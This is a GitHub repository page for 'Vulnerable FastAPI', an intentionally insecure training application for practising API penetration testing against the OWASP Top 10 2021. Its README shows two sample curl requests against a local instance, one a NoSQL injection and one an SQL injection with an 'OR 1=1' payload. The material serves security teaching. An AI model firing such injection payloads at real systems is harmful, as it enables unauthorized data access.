Skip to content
/ vfapi Public

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

git.io/vulnfapi

License

MIT license
9 stars 11 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

naryal2580/vfapi

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
static
static
 
 
ui
ui
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
main.py
main.py
 
 
requirements.txt
requirements.txt
 
 
run.sh
run.sh
 
 

Repository files navigation

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.

Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks

About

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

git.io/vulnfapi

Topics

sql nosql rest-api webapp vulnerable vulnerable-application vulnerable-web-app owasp-top-10 owasp-top-ten fastapi vulnerable-api owasp-top-ten-2021 owasp-top-10-2021

Resources

Readme

License

MIT license
Activity

Stars

9 stars

Watchers

1 watching

Forks

11 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages